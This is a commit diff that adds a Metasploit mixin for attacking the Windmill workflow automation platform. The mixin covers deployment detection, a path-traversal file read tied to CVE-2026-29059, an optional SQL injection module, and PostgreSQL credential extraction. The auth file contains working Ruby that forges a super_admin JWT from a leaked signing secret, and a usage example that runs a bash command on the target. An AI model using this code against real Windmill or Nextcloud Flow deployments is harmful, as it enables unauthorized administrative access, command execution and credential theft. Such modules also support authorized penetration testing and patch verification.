Feat: Add Msf::Exploit::Remote::HTTP::Windmill mixin

HTTP mixin for Windmill workflow automation platform. Handles deployment
detection (standalone, Nextcloud Flow proxy, Flow direct), authentication
via JWT forging, path traversal file read, workspace management, and
PostgreSQL heap file credential extraction.

Author: Chocapikk

lib/msf/core/exploit/remote/http/windmill.rb

@@ -0,0 +1,115 @@
+# -*- coding: binary -*-
+# frozen_string_literal: true
+
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        #
+        # Windmill API interaction mixin for Metasploit modules
+        #
+        # Provides primitives for interacting with Windmill workflow automation
+        # platform, including support for Nextcloud Flow deployments via AppAPI.
+        #
+        # == Supported Deployment Types
+        #
+        # - *Standalone*: Direct Windmill installation
+        # - *Nextcloud Flow (proxy)*: Windmill behind Nextcloud AppAPI proxy
+        # - *Nextcloud Flow (direct)*: Windmill accessible alongside Nextcloud
+        #
+        # == Included Modules
+        #
+        # The following modules are automatically included:
+        # - {Constants}: API endpoints and configuration values
+        # - {HttpHelpers}: Low-level HTTP request helpers
+        # - {Detection}: Deployment type auto-detection
+        # - {Auth}: Authentication and JWT forging
+        # - {Workspace}: Workspace management
+        # - {FileRead}: Path traversal file read (CVE-2026-29059)
+        # - {Jobs}: Job execution API
+        # - {Postgres}: PostgreSQL data extraction
+        #
+        # == Optional Modules
+        #
+        # The following must be explicitly included if needed:
+        # - {Sqli}: SQL injection via folder API (CVE pending)
+        #
+        # == Instance Variables
+        #
+        # The mixin maintains the following state:
+        # - @windmill_api_prefix: Detected API path prefix
+        # - @windmill_deployment_type: Deployment type constant
+        # - @windmill_token: Authentication token
+        # - @windmill_workspace: Current workspace ID
+        # - @windmill_version: Detected Windmill version
+        #
+        # == Example Usage
+        #
+        #   class MetasploitModule < Msf::Exploit::Remote
+        #     include Msf::Exploit::Remote::HTTP::Windmill
+        #
+        #     def exploit
+        #       return unless windmill_detect_deployment
+        #       windmill_login(datastore['USERNAME'], datastore['PASSWORD'])
+        #       windmill_run_job('id', language: 'bash')
+        #     end
+        #   end
+        #
+        # @author Valentin Lobstein (Chocapikk)
+        #
+        # @see https://github.com/Chocapikk/Windfall
+        # @see https://www.windmill.dev/
+        #
+        module Windmill
+          include Msf::Exploit::Remote::HttpClient
+          include Msf::Exploit::Remote::HTTP::Windmill::Constants
+          include Msf::Exploit::Remote::HTTP::Windmill::HttpHelpers
+          include Msf::Exploit::Remote::HTTP::Windmill::Detection
+          include Msf::Exploit::Remote::HTTP::Windmill::Auth
+          include Msf::Exploit::Remote::HTTP::Windmill::Workspace
+          include Msf::Exploit::Remote::HTTP::Windmill::FileRead
+          include Msf::Exploit::Remote::HTTP::Windmill::Jobs
+          include Msf::Exploit::Remote::HTTP::Windmill::Postgres
+
+          # @!attribute [rw] windmill_api_prefix
+          #   @return [String, nil] Detected API path prefix (e.g., '/api')
+          #
+          # @!attribute [rw] windmill_deployment_type
+          #   @return [String, nil] Deployment type (see Constants::DEPLOYMENT_*)
+          #
+          # @!attribute [rw] windmill_token
+          #   @return [String, nil] Authentication token (Bearer or JWT)
+          #
+          # @!attribute [rw] windmill_workspace
+          #   @return [String, nil] Current workspace ID
+          #
+          # @!attribute [rw] windmill_version
+          #   @return [String, nil] Detected Windmill version string
+          attr_accessor :windmill_api_prefix, :windmill_deployment_type, :windmill_token,
+                        :windmill_workspace, :windmill_version
+
+          #
+          # Initialize the Windmill mixin
+          #
+          # Registers module options and initializes instance variables.
+          #
+          # @param info [Hash] Module information hash
+          #
+          def initialize(info = {})
+            super
+
+            register_options([
+              Msf::OptString.new('TARGETURI', [true, 'Base path to Windmill', '/'])
+            ], Msf::Exploit::Remote::HTTP::Windmill)
+
+            @windmill_api_prefix = nil
+            @windmill_deployment_type = nil
+            @windmill_token = nil
+            @windmill_workspace = nil
+            @windmill_version = nil
+          end
+        end
+      end
+    end
+  end
+end

lib/msf/core/exploit/remote/http/windmill/auth.rb

@@ -0,0 +1,173 @@
+# -*- coding: binary -*-
+# frozen_string_literal: true
+
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        module Windmill
+          #
+          # Authentication and JWT methods for Windmill API
+          #
+          # Provides authentication primitives including:
+          # - Username/password login
+          # - JWT token forging (requires leaked jwt_secret)
+          # - Authentication verification
+          #
+          # @author Valentin Lobstein (Chocapikk)
+          #
+          module Auth
+            include Msf::Exploit::Remote::HTTP::Windmill::Constants
+
+            #
+            # Forge a Windmill JWT token with admin privileges
+            #
+            # Creates a valid JWT token using HMAC-SHA256 signing. The forged token
+            # grants super_admin privileges for the specified workspace.
+            #
+            # @param jwt_secret [String] The JWT signing secret (typically 32 alphanumeric chars)
+            # @param email [String] Email address for the forged identity
+            # @param workspace [String] Workspace ID to include in token claims
+            # @return [String] Forged JWT token prefixed with 'jwt_' (Windmill convention)
+            #
+            # @example Forge admin token
+            #   token = windmill_forge_jwt('abc123...', 'admin@example.com', 'main')
+            #   # => 'jwt_eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...'
+            #
+            def windmill_forge_jwt(jwt_secret, email, workspace)
+              header = { alg: 'HS256', typ: 'JWT' }
+              payload = {
+                email: email,
+                username: email.split('@').first,
+                is_admin: true,
+                is_operator: false,
+                groups: %w[all],
+                folders: [],
+                label: nil,
+                workspace_id: workspace,
+                exp: Time.now.to_i + (86_400 * 30) # 30 days
+              }
+
+              unsigned = [header, payload].map { |h| windmill_base64url_encode(h.to_json) }.join('.')
+              signature = OpenSSL::HMAC.digest('SHA256', jwt_secret, unsigned)
+
+              "jwt_#{unsigned}.#{windmill_base64url_encode(signature)}"
+            end
+
+            #
+            # Verify current authentication and retrieve user info
+            #
+            # Calls the /users/whoami endpoint to validate the current token
+            # and retrieve user details.
+            #
+            # @return [Hash, nil] User info hash or nil on failure
+            # @option return [String] :email User's email address
+            # @option return [Boolean] :super_admin Whether user is super admin
+            # @option return [Boolean] :is_admin Whether user is workspace admin
+            #
+            # @example Check authentication
+            #   if (info = windmill_verify_auth)
+            #     print_good("Logged in as #{info[:email]}")
+            #   end
+            #
+            def windmill_verify_auth
+              res = windmill_get(windmill_api_path(API_WHOAMI))
+              return unless res&.code == 200
+
+              JSON.parse(res.body).then do |data|
+                { email: data['email'], super_admin: data['super_admin'], is_admin: data['is_admin'] }
+              end
+            rescue JSON::ParserError
+              nil
+            end
+
+            #
+            # Authenticate to Windmill with username and password
+            #
+            # Performs email/password authentication and stores the resulting
+            # token in @windmill_token for subsequent requests.
+            #
+            # @param username [String] Email address or username
+            # @param password [String] Password
+            # @return [String, nil] Authentication token on success, nil on failure
+            #
+            # @example Login with credentials
+            #   if windmill_login('user@example.com', 'password123')
+            #     print_good('Authentication successful')
+            #   end
+            #
+            def windmill_login(username, password)
+              windmill_detect_deployment unless windmill_api_prefix
+
+              res = perform_login_request(username, password)
+              return handle_rate_limit if res&.code == 429
+              return unless res&.code == 200
+
+              extract_token(res)
+            end
+
+            private
+
+            #
+            # Perform the actual login HTTP request
+            #
+            # @param username [String] Email/username
+            # @param password [String] Password
+            # @return [Rex::Proto::Http::Response, nil] HTTP response
+            #
+            def perform_login_request(username, password)
+              opts = {
+                'ctype' => 'application/json',
+                'data' => { email: username, password: password }.to_json,
+                auth: false
+              }
+
+              if windmill_is_proxy? && datastore['NC_USER'] && datastore['NC_PASS']
+                opts['authorization'] = windmill_basic_auth(datastore['NC_USER'], datastore['NC_PASS'])
+              end
+
+              windmill_post(windmill_api_path(API_AUTH_LOGIN), **opts)
+            end
+
+            #
+            # Handle rate limit response from Nextcloud
+            #
+            # @return [nil] Always returns nil
+            #
+            def handle_rate_limit
+              print_error('Rate limited by Nextcloud. Please try again later.')
+              nil
+            end
+
+            #
+            # Extract and store token from login response
+            #
+            # @param res [Rex::Proto::Http::Response] Login response
+            # @return [String, nil] Token string or nil
+            #
+            def extract_token(res)
+              token = res.body.strip.delete('"')
+              return if token.empty?
+
+              @windmill_token = token
+              extract_proxy_cookie(res) if windmill_is_proxy?
+              token
+            end
+
+            #
+            # Extract token cookie from proxy response
+            #
+            # @param res [Rex::Proto::Http::Response] Response with cookies
+            # @return [void]
+            #
+            def extract_proxy_cookie(res)
+              return unless res.get_cookies =~ /token=([^;]+)/
+
+              @windmill_token_cookie = ::Regexp.last_match(1)
+            end
+          end
+        end
+      end
+    end
+  end
+end